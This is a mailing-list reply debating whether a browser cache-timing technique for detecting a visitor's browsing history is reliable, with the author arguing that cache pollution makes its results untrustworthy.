Re: cache cookies?

["James N. Potts" <jnp () CRNET COM>]

Thomas Reinke wrote:
> Actually, it *does* work.  We have on our site a
> working demonstration of the exploit, showing whether or not
> you've visited one or more of more than 80 different well known
> sites.  The URL is
>
>    http://www.securityspace.com/exploit/exploit_2a.html
>
> We've found with the demo that
>
>    a) It is as reliable as the ability to find an image that
>       would be cached by the browser. In fact, the timing is
>       very accurate, but other factors can fool the mechanism.
>       Out of the 80 odd sites we tested, we had 3 false negatives.

The first time I tried your exploit, I had negatives for every site.  The
second time, I had positives for every site (as has been pointed out would
happen).

Which leads to:

>    b) Dangerous is subjective - a malicious site CAN find
>       out what sites you have visited. How much they can do
>       with it? Well..that's up to the imagination. Certainly
>       I doubt (hope?) that larger organizations wouldn't
>       stoop to this trick, but I honestly see nothing preventing
>       advertising orgs and so on from not doing this, other
>       than the uproar it would cause in the industry.

Because of the above problem, the data becomes useless.  After visiting a
malicious site once, that site can never see if you've visited anyone
since (without regularly changing the files that they look for).  Plus,
there's bound to be overlap between malicious sites; it's plausable that
within a short period of time, all users visiting malicious sites would
have positives for all overlapping sites, even though the users have never
truely visited those sites.  Since the data isn't trustworthy, why would
sites bother to look for it?

-Jim Potts